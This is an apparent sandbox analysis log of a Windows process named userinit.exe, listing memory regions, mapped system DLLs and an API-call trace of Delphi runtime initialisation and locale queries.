start_va = 0x2810000
end_va = 0x2892fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 4282
start_va = 0x2780000
end_va = 0x2804fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4283
start_va = 0x2810000
end_va = 0x2896fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 4284
start_va = 0x2780000
end_va = 0x2808fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4285
start_va = 0x2810000
end_va = 0x289afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 4287
start_va = 0x2780000
end_va = 0x280cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4288
start_va = 0x2810000
end_va = 0x289efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 4289
start_va = 0x28a0000
end_va = 0x2930fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028a0000"
filename = ""
Region:
id = 4323
start_va = 0x2780000
end_va = 0x2812fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4324
start_va = 0x2820000
end_va = 0x28b4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 4325
start_va = 0x2780000
end_va = 0x2816fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4326
start_va = 0x2820000
end_va = 0x28b8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 4327
start_va = 0x2780000
end_va = 0x281afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4328
start_va = 0x2820000
end_va = 0x28bcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 4329
start_va = 0x2780000
end_va = 0x281efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4330
start_va = 0x2820000
end_va = 0x28c0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 4339
start_va = 0x28d0000
end_va = 0x2972fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028d0000"
filename = ""
Region:
id = 4340
start_va = 0x2780000
end_va = 0x2824fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4341
start_va = 0x2830000
end_va = 0x28d6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 4353
start_va = 0x2780000
end_va = 0x2828fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4354
start_va = 0x2830000
end_va = 0x28dafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 4355
start_va = 0x2780000
end_va = 0x282cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4356
start_va = 0x2830000
end_va = 0x28defff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 4357
start_va = 0x28e0000
end_va = 0x2990fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028e0000"
filename = ""
Region:
id = 4359
start_va = 0x2780000
end_va = 0x2832fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4360
start_va = 0x2840000
end_va = 0x28f4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002840000"
filename = ""
Region:
id = 4361
start_va = 0x2780000
end_va = 0x2836fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4363
start_va = 0x2840000
end_va = 0x28f8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002840000"
filename = ""
Region:
id = 4364
start_va = 0x2780000
end_va = 0x283afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4369
start_va = 0x2840000
end_va = 0x28fcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002840000"
filename = ""
Region:
id = 4370
start_va = 0x2780000
end_va = 0x283efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4371
start_va = 0x2840000
end_va = 0x2900fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002840000"
filename = ""
Region:
id = 4376
start_va = 0x2910000
end_va = 0x29d2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002910000"
filename = ""
Region:
id = 4377
start_va = 0x2780000
end_va = 0x2844fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4378
start_va = 0x2850000
end_va = 0x2916fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002850000"
filename = ""
Region:
id = 4382
start_va = 0x2780000
end_va = 0x2848fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4383
start_va = 0x2850000
end_va = 0x291afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002850000"
filename = ""
Region:
id = 4388
start_va = 0x2780000
end_va = 0x284cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4389
start_va = 0x2850000
end_va = 0x291efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002850000"
filename = ""
Region:
id = 4390
start_va = 0x2920000
end_va = 0x29f0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002920000"
filename = ""
Region:
id = 4394
start_va = 0x2780000
end_va = 0x2852fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4395
start_va = 0x2860000
end_va = 0x2934fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002860000"
filename = ""
Region:
id = 4396
start_va = 0x2780000
end_va = 0x2856fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4400
start_va = 0x2860000
end_va = 0x2938fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002860000"
filename = ""
Region:
id = 4401
start_va = 0x2780000
end_va = 0x285afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4405
start_va = 0x2860000
end_va = 0x293cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002860000"
filename = ""
Region:
id = 4406
start_va = 0x2780000
end_va = 0x285efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4409
start_va = 0x2860000
end_va = 0x2940fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002860000"
filename = ""
Region:
id = 4410
start_va = 0x2950000
end_va = 0x2a32fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002950000"
filename = ""
Region:
id = 4414
start_va = 0x2780000
end_va = 0x2864fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4415
start_va = 0x2870000
end_va = 0x2956fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002870000"
filename = ""
Region:
id = 4418
start_va = 0x2780000
end_va = 0x2868fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4419
start_va = 0x2870000
end_va = 0x295afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002870000"
filename = ""
Region:
id = 4423
start_va = 0x2780000
end_va = 0x286cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4424
start_va = 0x2870000
end_va = 0x295efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002870000"
filename = ""
Region:
id = 4427
start_va = 0x2960000
end_va = 0x2a50fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002960000"
filename = ""
Region:
id = 4428
start_va = 0x2780000
end_va = 0x2872fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4431
start_va = 0x2880000
end_va = 0x2974fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002880000"
filename = ""
Region:
id = 4432
start_va = 0x2780000
end_va = 0x2876fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4435
start_va = 0x2880000
end_va = 0x2978fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002880000"
filename = ""
Region:
id = 4436
start_va = 0x2780000
end_va = 0x287afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4439
start_va = 0x2880000
end_va = 0x297cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002880000"
filename = ""
Region:
id = 4442
start_va = 0x2780000
end_va = 0x287efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4443
start_va = 0x2880000
end_va = 0x2980fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002880000"
filename = ""
Region:
id = 4446
start_va = 0x2990000
end_va = 0x2a92fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002990000"
filename = ""
Region:
id = 4449
start_va = 0x2780000
end_va = 0x2884fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4450
start_va = 0x2890000
end_va = 0x2996fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002890000"
filename = ""
Region:
id = 4453
start_va = 0x2780000
end_va = 0x2888fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4454
start_va = 0x2890000
end_va = 0x299afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002890000"
filename = ""
Region:
id = 4458
start_va = 0x2780000
end_va = 0x288cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4459
start_va = 0x2890000
end_va = 0x299ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002890000"
filename = ""
Region:
id = 4462
start_va = 0x29a0000
end_va = 0x2ab2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000029a0000"
filename = ""
Region:
id = 4463
start_va = 0x750e0000
end_va = 0x750ebfff
entry_point = 0x750e0000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 4464
start_va = 0x751b0000
end_va = 0x752ccfff
entry_point = 0x751b0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 4465
start_va = 0x754c0000
end_va = 0x756bafff
entry_point = 0x754c0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 4466
start_va = 0x75a80000
end_va = 0x75bb5fff
entry_point = 0x75a80000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 4467
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 4468
start_va = 0x76920000
end_va = 0x76a14fff
entry_point = 0x76920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 4469
start_va = 0x71bf0000
end_va = 0x71c2bfff
entry_point = 0x71bf0000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 4470
start_va = 0x100000
end_va = 0x100fff
entry_point = 0x100000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 4471
start_va = 0x2ac0000
end_va = 0x2bbffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002ac0000"
filename = ""
Region:
id = 4472
start_va = 0x110000
end_va = 0x110fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 4473
start_va = 0x6d790000
end_va = 0x6d7a8fff
entry_point = 0x6d790000
region_type = mapped_file
name = "olepro32.dll"
filename = "\\Windows\\System32\\olepro32.dll" (normalized: "c:\\windows\\system32\\olepro32.dll")
Region:
id = 4476
start_va = 0x73b10000
end_va = 0x73b20fff
entry_point = 0x73b10000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 4477
start_va = 0x73b00000
end_va = 0x73b08fff
entry_point = 0x73b00000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 4478
start_va = 0x74f10000
end_va = 0x74f28fff
entry_point = 0x74f10000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 4479
start_va = 0x73af0000
end_va = 0x73afefff
entry_point = 0x73af0000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 4482
start_va = 0x2e0000
end_va = 0x31ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000002e0000"
filename = ""
Region:
id = 4483
start_va = 0x2be0000
end_va = 0x2cdffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002be0000"
filename = ""
Region:
id = 4484
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 4485
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 4486
start_va = 0x2ce0000
end_va = 0x2faefff
entry_point = 0x2ce0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 4487
start_va = 0x120000
end_va = 0x121fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000120000"
filename = ""
Region:
id = 4488
start_va = 0x73e90000
end_va = 0x7402dfff
entry_point = 0x73e90000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 4489
start_va = 0x130000
end_va = 0x130fff
entry_point = 0x130000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 4492
start_va = 0x140000
end_va = 0x141fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000140000"
filename = ""
Region:
id = 4493
start_va = 0x74fa0000
end_va = 0x74fbafff
entry_point = 0x74fa0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 4494
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 4495
start_va = 0x130000
end_va = 0x130fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000130000"
filename = ""
Region:
id = 4496
start_va = 0x75070000
end_va = 0x7507afff
entry_point = 0x75070000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 4497
start_va = 0x190000
end_va = 0x1bbfff
entry_point = 0x190000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 4498
start_va = 0x1c0000
end_va = 0x1c7fff
entry_point = 0x1c0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 4499
start_va = 0x1d0000
end_va = 0x1dffff
entry_point = 0x1d0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 4500
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 4501
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 4502
start_va = 0x2fb0000
end_va = 0x303ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002fb0000"
filename = ""
Region:
id = 4503
start_va = 0x749c0000
end_va = 0x74a03fff
entry_point = 0x749c0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 4504
start_va = 0x3040000
end_va = 0x30dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003040000"
filename = ""
Region:
id = 4505
start_va = 0x73d70000
end_va = 0x73d8bfff
entry_point = 0x73d70000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 4506
start_va = 0x73d60000
end_va = 0x73d66fff
entry_point = 0x73d60000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 4509
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 4510
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 4511
start_va = 0x30e0000
end_va = 0x319ffff
entry_point = 0x30e0000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Thread:
id = 264
os_tid = 0x89c
[0137.329] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
[0137.329] GetKeyboardType (nTypeFlag=0) returned 4
[0137.329] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0137.329] GetStartupInfoA (in: lpStartupInfo=0x18fba4 | out: lpStartupInfo=0x18fba4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0137.330] GetVersion () returned 0x1db10106
[0137.330] GetVersion () returned 0x1db10106
[0137.330] GetCurrentThreadId () returned 0x89c
[0137.330] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18f6a0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0137.330] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f57b, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0137.330] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f690 | out: phkResult=0x18f690*=0x0) returned 0x2
[0137.330] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f690 | out: phkResult=0x18f690*=0x0) returned 0x2
[0137.330] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f690 | out: phkResult=0x18f690*=0x0) returned 0x2
[0137.330] lstrcpynA (in: lpString1=0x18f57b, lpString2="C:\\Windows\\System32\\userinit.exe", iMaxLength=261 | out: lpString1="C:\\Windows\\System32\\userinit.exe") returned="C:\\Windows\\System32\\userinit.exe"
[0137.330] GetThreadLocale () returned 0x409
[0137.330] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x18f68b, cchData=5 | out: lpLCData="ENU") returned 4
[0137.331] lstrlenA (lpString="C:\\Windows\\System32\\userinit.exe") returned 32
[0137.331] lstrcpynA (in: lpString1=0x18f598, lpString2="ENU", iMaxLength=232 | out: lpString1="ENU") returned="ENU"
[0137.331] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.ENU", hFile=0x0, dwFlags=0x2) returned 0x0
[0137.331] lstrcpynA (in: lpString1=0x18f598, lpString2="EN", iMaxLength=232 | out: lpString1="EN") returned="EN"
[0137.331] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.EN", hFile=0x0, dwFlags=0x2) returned 0x0
[0137.331] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x18f7c4, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0137.331] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x5b3640
[0137.331] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x12a0000
[0137.332] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x5b4640
[0137.332] VirtualAlloc (lpAddress=0x12a0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x12a0000
[0137.332] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x18f7c4, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0137.332] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x18f7c4, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0137.332] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x18f7c4, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0137.332] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x18f7c4, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0137.332] LoadStringA (in: hInstance=0x400000, uID=0xffd9, lpBuffer=0x18f7c4, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0137.332] LoadStringA (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0x18f7c4, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0137.332] LoadStringA (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x18f7c4, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0137.332] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0x18f7c4, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0137.332] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x18f7c4, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0137.332] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x18f7c4, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0137.332] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x18f7c4, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0137.332] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x18f7c4, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0137.332] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x18f7c4, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0137.332] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x18f7c4, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0137.332] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x18f7c4, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0137.332] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x18f7c4, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0137.332] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x18f7c4, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0137.332] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x18f7c4, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0137.332] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x18f7c4, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0137.332] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x18f7c4, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0137.333] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x18f7c4, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0137.333] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x18f7c4, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0137.333] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x18f7c4, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0137.333] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x18f7c4, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0137.333] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x18f7c4, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0137.333] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x18f7c4, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0137.333] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x18f7c4, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0137.333] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x18f7c4, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0137.333] LoadStringA (in: hInstance=0x400000, uID=0xfff1, lpBuffer=0x18f7b0, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0137.333] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x18f7b0, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0137.333] GetVersionExA (in: lpVersionInformation=0x18fb48*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18fb48*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0137.333] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0137.333] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0137.333] GetThreadLocale () returned 0x409
[0137.333] GetThreadLocale () returned 0x409
[0137.333] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x18fa20, cchData=256 | out: lpLCData="Jan") returned 4
[0137.333] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x18fa20, cchData=256 | out: lpLCData="January") returned 8
[0137.333] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x18fa20, cchData=256 | out: lpLCData="Feb") returned 4
[0137.333] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x18fa20, cchData=256 | out: lpLCData="February") returned 9
[0137.333] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x18fa20, cchData=256 | out: lpLCData="Mar") returned 4
[0137.333] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x18fa20, cchData=256 | out: lpLCData="March") returned 6
